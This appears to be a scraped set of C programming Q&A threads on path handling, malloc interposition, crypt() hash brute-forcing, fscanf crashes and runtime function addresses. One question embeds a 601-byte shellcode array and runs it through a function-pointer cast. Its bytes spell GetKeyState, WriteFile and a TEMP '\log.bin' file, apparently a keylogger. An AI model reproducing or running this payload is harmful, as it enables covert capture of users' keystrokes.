Chopping Paths in C - c

I want to preface this by saying that I've done very little programming in C, so I'd prefer to know why a given solution works rather than just what it is.
I'm trying to write a function which will take a pathname, and return a pathname to a different file in the same directory.
"/example/directory/with/image.png" => "/example/directory/with/thumbnail.png"
What I've tried after reading up on example uses of realpath and dirname (I'm working on Linux; if there's a cross-platform equivalent, let me know) is:
#include <limits.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
char *chop_path(char *orig) {
char buf[PATH_MAX + 1];
char *res, *dname, *thumb;
res = realpath(orig, buf);
if (res) {
dname = dirname(res);
thumb = strcat(dname, "/thumbnail.png");
return thumb;
}
return 0;
}
Compiling it seems to work, but running the program with
int main(void) {
char *res = chop_path("original.png");
if (res) {
printf("Resulting pathname: %s", res);
}
return 0;
}
gives me a segfault. Any hints?

The only problem I see is the signature of your chop_path routine; it should be
char *chop_path(char *orig) {
Your version has a missing *. That makes an enormous difference actually; without the *, you're effectively telling dirname and realpath to interpret the character code of the first character in your argument string as the numerical address (i.e., a pointer to) the path. That's going to point into a location in low memory that you definitely have not allocated; trying to use it results in that "segmentation fault" error, which means, effectively, that you're trying to touch memory you're not allowed to.
The other issue turned out to be that the dirname() function is declared in libgen.h, which you weren't including. If you don't include that header, the compiler assumes dirname() returns int instead of a pointer, and on a 64-bit architecture, the 64-bit return value from the function gets chopped down to 32 bits, a bad pointer is assigned to dname, and that's going to cause your seg fault right there.

If you don't want to use dirname, realpath, unwanted string buffer and string operations, etc - you can do the following:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>
#define FILE_MAX 100
void chop_path(char path_name[], char new_file[]) {
int len = strlen(path_name);
int i;
for (i=len-1; i>0 ; i--) {
if (path_name[i] == '/') {
strcpy(path_name+i+1, new_file);
break;
}
}
return;
}
int main(void) {
char path[PATH_MAX + 1] = "/this/is/a/path/filename.c";
char new_file[FILE_MAX] = "newfilename.txt";
printf("old : %s \n", path);
chop_path(path, new_file);
printf("new : %s \n", path);
return 0;
}
Output:
$ gcc path.c
$ ./a.out
old : /this/is/a/path/filename.c
new : /this/is/a/path/newfilename.txt
$

Related

Library interpositioning

I have been trying to intercept calls to malloc and free, following our textbook (CSAPP book).
I have followed their exact code, and nearly the same code that I found online and I keep getting a segmentation fault. I heard our professor saying something about printf that mallocs and frees memory so I think that this happens because I am intercepting a malloc and since I am using a printf function inside the intercepting function, it will call itself recursively.
However I can't seem to find a solution to solving this problem? Our professor demonstrated that intercepting worked ( he didn't show us the code) and prints our information every time a malloc occurs, so I do know that it's possible.
Can anyone suggest a working method??
Here is the code that I used and get nothing:
mymalloc.c
#ifdef RUNTIME
// Run-time interposition of malloc and free based on // dynamic linker's (ld-linux.so) LD_PRELOAD mechanism #define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h> #include <dlfcn.h>
void *malloc(size_t size) {
static void *(*mallocp)(size_t size) = NULL; char *error;
void *ptr;
// get address of libc malloc
if (!mallocp) {
mallocp = dlsym(RTLD_NEXT, "malloc"); if ((error = dlerror()) != NULL) {
fputs(error, stderr);
exit(EXIT_FAILURE);
}
}
ptr = mallocp(size);
printf("malloc(%d) = %p\n", (int)size, ptr); return ptr;
}
#endif
test.c
#include <stdio.h>
#include <stdlib.h>
int main(){
printf("main\n");
int* a = malloc(sizeof(int)*5);
a[0] = 1;
printf("end\n");
}
The result i'm getting:
$ gcc -o test test.c
$ gcc -DRUNTIME -shared -fPIC mymalloc.c -o mymalloc.so
$ LD_PRELOAD=./mymalloc.so ./test
Segmentation Fault
This is the code that I tried and got segmentation fault (from https://gist.github.com/iamben/4124829):
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
void* malloc(size_t size)
{
static void* (*rmalloc)(size_t) = NULL;
void* p = NULL;
// resolve next malloc
if(!rmalloc) rmalloc = dlsym(RTLD_NEXT, "malloc");
// do actual malloc
p = rmalloc(size);
// show statistic
fprintf(stderr, "[MEM | malloc] Allocated: %lu bytes\n", size);
return p;
}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define STR_LEN 128
int main(int argc, const char *argv[])
{
char *c;
char *str1 = "Hello ";
char *str2 = "World";
//allocate an empty string
c = malloc(STR_LEN * sizeof(char));
c[0] = 0x0;
//and concatenate str{1,2}
strcat(c, str1);
strcat(c, str2);
printf("New str: %s\n", c);
return 0;
}
The makefile from the git repo didn't work so I manually compiled the files and got:
$ gcc -shared -fPIC libint.c -o libint.so
$ gcc -o str str.c
$ LD_PRELOAD=./libint.so ./str
Segmentation fault
I have been doing this for hours and I still get the same incorrect result, despite the fact that I copied textbook code. I would really appreciate any help!!
One way to deal with this is to turn off the printf when your return is called recursively:
static char ACallIsInProgress = 0;
if (!ACallIsInProgress)
{
ACallIsInProgress = 1;
printf("malloc(%d) = %p\n", (int)size, ptr);
ACallIsInProgress = 0;
}
return ptr;
With this, if printf calls malloc, your routine will merely call the actual malloc (via mallocp) and return without causing another printf. You will miss printing information about a call to malloc that the printf does, but that is generally tolerable when interposing is being used to study the general program, not the C library.
If you need to support multithreading, some additional work might be needed.
The printf implementation might allocate a buffer only once, the first time it is used. In that case, you can initialize a flag that turns off the printf similar to the above, call printf once in the main routine (maybe be sure it includes a nice formatting task that causes printf to allocate a buffer, not a plain string), and then set the flag to turn on the printf call and leave it set for the rest of the program.
Another option is for your malloc routine not to use printf at all but to cache data in a buffer to be written later by some other routine or to write raw data to a file using write, with that data interpreted and formatted by a separate program later. Or the raw data could be written by a pipe to a program that formats and prints it and that is not using your interposed malloc.

Variable is unexpectedly overwritten in for loop with crypt()

I'm trying to build a C program that will bruteforce a hash given in argument. Here is the code:
#include <unistd.h>
#include <stdio.h>
#include <crypt.h>
#include <string.h>
const char setting[] = "$6$QSX8hjVa$";
const char values[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
int main(int argc, char *argv[])
{
char *hashToCrack = crypt(argv[1], setting);
printf("%s\n", hashToCrack);
for (int i = 0; i < strlen(values); i++)
{
printf("trying %c ...\n", values[i]);
char *try = crypt(&values[i], setting);
if (strcmp(hashToCrack, try) == 0)
{
printf("calc: %s\n", try);
printf("init: %s\n", hashToCrack);
printf("Found!\n");
}
}
return 0;
}
For convenience, I just give in argument a string that will be the one to crack. It is encrypted at the beginning of the main function (stored in hashToCrack). For now, I just work with one char. I compile the program this way: gcc main.c -o main -lcrypt -Wall.
The problem - When I launch this program, I have "Found!" in every iteration in the for loop. It seems that hashToCrack and try are the same. However, I never overwrite hashToCrack, so it should never change.
There is probably something I don't understand with pointers, but I can't find it.
Any idea ? :D
The crypt function returns a pointer to a static data buffer. So when you call it again, the string pointed to by hashToCrack changes.
You need to copy the results of the first call to crypt into a separate buffer.
char *hashToCrack = strdup(crypt(argv[1], setting));
Don't forget to call free on this buffer when you're done with it.

Stackdump - compiled .c code

If I execute the following code, it´s prin this stack dump error message:
1 [main] MyProg 10876 cygwin_exception::open_stackdumpfile: Dumping stack trace to MyProg.exe.stackdump
after it prints
Shellcode length: 601
Can you say me, what I should change, to get it working?
I have compiled it with Sublime Text and cygwin on Windows 10 64bit.
This is the code:
#include <stdio.h>
#include <string.h>
const char sc[] = "\xfc\x31\xd2\xb2\x30\x64\xff\x32\x5a\x8b\x52\x0c\x8b\x52\x14\x8b"
"\x72\x28\x31\xc0\x89\xc1\xb1\x03\xac\xc1\xc0\x08\xac\xe2\xf9\xac"
"\x3d\x4e\x52\x45\x4b\x74\x05\x3d\x6e\x72\x65\x6b\x8b\x5a\x10\x8b"
"\x12\x75\xdc\x8b\x53\x3c\x01\xda\xff\x72\x34\x8b\x52\x78\x01\xda"
"\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74"
"\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64"
"\x64\x72\x65\x75\xe2\x49\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x8b"
"\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x89\xd7\x52\x31\xc0\x50\x68"
"\x64\x6c\x65\x41\x68\x65\x48\x61\x6e\x68\x6f\x64\x75\x6c\x68\x47"
"\x65\x74\x4d\x54\x53\xff\xd7\x8d\x64\x24\x14\x50\x68\x4c\x4c\x01"
"\x88\xfe\x4c\x24\x02\x68\x33\x32\x2e\x44\x68\x55\x53\x45\x52\x54"
"\xff\xd0\x31\xd2\x39\xd0\x75\x38\x8d\x64\x24\x0c\x52\x68\x61\x72"
"\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd7"
"\x8d\x64\x24\x10\x50\x68\x4c\x4c\x01\x77\xfe\x4c\x24\x02\x68\x33"
"\x32\x2e\x44\x68\x55\x53\x45\x52\x54\xff\xd0\x8d\x64\x24\x0c\x50"
"\x89\xc2\x68\x61\x74\x65\x01\xfe\x4c\x24\x03\x68\x65\x79\x53\x74"
"\x68\x47\x65\x74\x4b\x54\x52\xff\xd7\x8d\x64\x24\x0c\x50\x68\x65"
"\x01\x01\x55\xfe\x4c\x24\x01\x68\x65\x46\x69\x6c\x68\x57\x72\x69"
"\x74\x54\x53\xff\xd7\x8d\x64\x24\x0c\x50\x68\x6c\x65\x41\x01\xfe"
"\x4c\x24\x03\x68\x74\x65\x46\x69\x68\x43\x72\x65\x61\x54\x53\xff"
"\xd7\x8d\x64\x24\x0c\x50\x68\x6c\x65\x41\x01\xfe\x4c\x24\x03\x68"
"\x72\x69\x61\x62\x68\x6e\x74\x56\x61\x68\x6f\x6e\x6d\x65\x68\x6e"
"\x76\x69\x72\x68\x47\x65\x74\x45\x54\x53\xff\xd7\x8d\x64\x24\x18"
"\x50\x6a\x70\x68\x53\x6c\x65\x65\x54\x53\xff\xd7\x8d\x64\x24\x08"
"\x50\x52\x68\x63\x61\x74\x41\x68\x6c\x73\x74\x72\x54\x53\xff\xd7"
"\x8d\x64\x24\x0c\x50\x31\xc9\xb1\x0e\x51\xe2\xfd\x51\x68\x54\x45"
"\x4d\x50\x89\xe1\x6a\x40\x51\x51\xff\x54\x24\x54\x89\xe2\x6a\x01"
"\xfe\x0c\x24\x68\x2e\x62\x69\x6e\x68\x5c\x6c\x6f\x67\x89\xe1\x51"
"\x52\xff\x54\x24\x54\x31\xc9\x51\x51\x80\x04\x24\x80\x6a\x04\x51"
"\x6a\x02\x51\x80\x04\x24\x04\x50\xff\x54\x24\x74\x8d\x64\x24\x4c"
"\x50\x31\xc9\x89\xce\xb1\x08\x56\xe2\xfd\x31\xc9\x31\xf6\x6a\x08"
"\xff\x54\x24\x2c\x89\xf0\x3c\xff\x73\xf0\x46\x56\xff\x54\x24\x3c"
"\x89\xf2\x31\xc9\xb1\x80\x21\xc8\x31\xc9\x39\xc8\x75\x10\x31\xd2"
"\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xb3\x14\x84\xeb\xd6\x31\xd2"
"\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xa3\x14\x84\x72\xc6\x31\xd2"
"\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xab\x14\x84\x31\xc9\x56\x51"
"\x8d\x0c\x24\x51\x6a\x01\x8d\x4c\x24\x0c\x51\xff\x74\x24\x34\xff"
"\x54\x24\x4c\x8d\x64\x24\x04\xeb\x91";
int main(int argc, char *argv[]){
printf("Shellcode length: %d\n", (int)strlen(sc));
(*(void(*)(void))&sc)();
return 0;
}
This: (*(void(*)(void))&sc)();
You're taking a pointer to the first element of a const char[], casting it to a function pointer and attempting to execute that function.
I can't honestly imagine that ever succeeding.... the only way I can think of to 'get it working', since I have no idea what your intention is, is to not cast const char pointer and attempt to execute it as a function.
If you just want a pointer to a function, this is easy:
void sc (void)
{
// do things
}
int main (void)
{
void (*fptr)(void);
fptr = sc;
fptr();
}

Ignoring return value of fscanf and Segmentation fault

I was wondering how to solve a Core dumped issue on my C code.
When I compile it with: g++ -g MatSim.cpp -o MatSim -lstdc++ -O3, I get three warnings, this is one (The other two are similar and are only differentiated by the string variable name):
MatSim.cpp: In function ‘int main()’:
MatSim.cpp:200037:27: warning: ignoring return value of ‘int fscanf(FILE*, const char*, ...)’, declared with attribute warn_unused_result [-Wunused-result]
fscanf(TM,"%255s",string2);
The principal aspects of my code and the related part that the compiler reports:
#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
#include <iostream>
#include <fstream>
#include <string.h>
using namespace std;
int to_int(char string[256])
{
if( strcmp(string,"0") == 0 )
{
return 0;
}
...
else if( strcmp(string,"50000") == 0 )
{
return 50000;
}
return -1;
}
int main()
{
int a,b,div,value,k,i,j,tm,ler;
char string[256];
char string1[256];
char string2[256];
FILE *TM;
TM = fopen("TM","r");
if( (TM = fopen("TM","r")) == NULL)
{
printf("Can't open %s\n","TM");
exit(1);
}
fscanf(TM,"%255s",string2);
tm = to_int(string2);
fclose(TM);
...
}
I have tried the reported suggestion in here and I tried to understand what was posted in here. But, I don't see its application on my code.
Finally, when I run the exe file, it returns:
Segmentation fault (core dumped)`.
In your code, you're fopen()ing the file twice. Just get rid of the
TM = fopen("TM","r");
before the if statement.
That said, you should check the value of fscanf() to ensure success. Otherwise, you'll end up reading an uninitialized array string2, which is not null-terminated which in turn invokes undefined behaviour.
Please be aware, almost all string related functions expect a null-terminated char array. If your array is not null terminated, there will be UB. Also, it is a good practice to initialize your automatic local variables to avoid possible UB in later part of code.
You are opening the file twice.
Alll you need is this:
FILE *TM = fopen("TM","r");
if (TM == NULL) { /* file was not opened */ }

Find program's code address at runtime?

When I use gdb to debug a program written in C, the command disassemble shows the codes and their addresses in the code memory segmentation. Is it possible to know those memory addresses at runtime? I am using Ubuntu OS. Thank you.
[edit] To be more specific, I will demonstrate it with following example.
#include <stdio.h>
int main(int argc,char *argv[]){
myfunction();
exit(0);
}
Now I would like to have the address of myfunction() in the code memory segmentation when I run my program.
Above answer is vastly overcomplicated. If the function reference is static, as it is above, the address is simply the value of the symbol name in pointer context:
void* myfunction_address = myfunction;
If you are grabbing the function dynamically out of a shared library, then the value returned from dlsym() (POSIX) or GetProcAddress() (windows) is likewise the address of the function.
Note that the above code is likely to generate a warning with some compilers, as ISO C technically forbids assignment between code and data pointers (some architectures put them in physically distinct address spaces).
And some pedants will point out that the address returned isn't really guaranteed to be the memory address of the function, it's just a unique value that can be compared for equality with other function pointers and acts, when called, to transfer control to the function whose pointer it holds. Obviously all known compilers implement this with a branch target address.
And finally, note that the "address" of a function is a little ambiguous. If the function was loaded dynamically or is an extern reference to an exported symbol, what you really get is generally a pointer to some fixup code in the "PLT" (a Unix/ELF term, though the PE/COFF mechanism on windows is similar) that then jumps to the function.
If you know the function name before program runs, simply use
void * addr = myfunction;
If the function name is given at run-time, I once wrote a function to find out the symbol address dynamically using bfd library. Here is the x86_64 code, you can get the address via find_symbol("a.out", "myfunction") in the example.
#include <bfd.h>
#include <stdio.h>
#include <stdlib.h>
#include <type.h>
#include <string.h>
long find_symbol(char *filename, char *symname)
{
bfd *ibfd;
asymbol **symtab;
long nsize, nsyms, i;
symbol_info syminfo;
char **matching;
bfd_init();
ibfd = bfd_openr(filename, NULL);
if (ibfd == NULL) {
printf("bfd_openr error\n");
}
if (!bfd_check_format_matches(ibfd, bfd_object, &matching)) {
printf("format_matches\n");
}
nsize = bfd_get_symtab_upper_bound (ibfd);
symtab = malloc(nsize);
nsyms = bfd_canonicalize_symtab(ibfd, symtab);
for (i = 0; i < nsyms; i++) {
if (strcmp(symtab[i]->name, symname) == 0) {
bfd_symbol_info(symtab[i], &syminfo);
return (long) syminfo.value;
}
}
bfd_close(ibfd);
printf("cannot find symbol\n");
}
To get a backtrace, use execinfo.h as documented in the GNU libc manual.
For example:
#include <execinfo.h>
#include <stdio.h>
#include <unistd.h>
void trace_pom()
{
const int sz = 15;
void *buf[sz];
// get at most sz entries
int n = backtrace(buf, sz);
// output them right to stderr
backtrace_symbols_fd(buf, n, fileno(stderr));
// but if you want to output the strings yourself
// you may use char ** backtrace_symbols (void *const *buffer, int size)
write(fileno(stderr), "\n", 1);
}
void TransferFunds(int n);
void DepositMoney(int n)
{
if (n <= 0)
trace_pom();
else TransferFunds(n-1);
}
void TransferFunds(int n)
{
DepositMoney(n);
}
int main()
{
DepositMoney(3);
return 0;
}
compiled
gcc a.c -o a -g -Wall -Werror -rdynamic
According to the mentioned website:
Currently, the function name and offset only be obtained on systems that use the ELF
binary format for programs and libraries. On other systems, only the hexadecimal return
address will be present. Also, you may need to pass additional flags to the linker to
make the function names available to the program. (For example, on systems using GNU
ld, you must pass (-rdynamic.)
Output
./a(trace_pom+0xc9)[0x80487fd]
./a(DepositMoney+0x11)[0x8048862]
./a(TransferFunds+0x11)[0x8048885]
./a(DepositMoney+0x21)[0x8048872]
./a(TransferFunds+0x11)[0x8048885]
./a(DepositMoney+0x21)[0x8048872]
./a(TransferFunds+0x11)[0x8048885]
./a(DepositMoney+0x21)[0x8048872]
./a(main+0x1d)[0x80488a4]
/lib/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb7e16775]
./a[0x80486a1]
About a comment in an answer (getting the address of an instruction), you can use this very ugly trick
#include <setjmp.h>
void function() {
printf("in function\n");
printf("%d\n",__LINE__);
printf("exiting function\n");
}
int main() {
jmp_buf env;
int i;
printf("in main\n");
printf("%d\n",__LINE__);
printf("calling function\n");
setjmp(env);
for (i=0; i < 18; ++i) {
printf("%p\n",env[i]);
}
function();
printf("in main again\n");
printf("%d\n",__LINE__);
}
It should be env[12] (the eip), but be careful as it looks machine dependent, so triple check my word. This is the output
in main
13
calling function
0xbfff037f
0x0
0x1f80
0x1dcb
0x4
0x8fe2f50c
0x0
0x0
0xbffff2a8
0xbffff240
0x1f
0x292
0x1e09
0x17
0x8fe0001f
0x1f
0x0
0x37
in function
4
exiting function
in main again
37
have fun!

Resources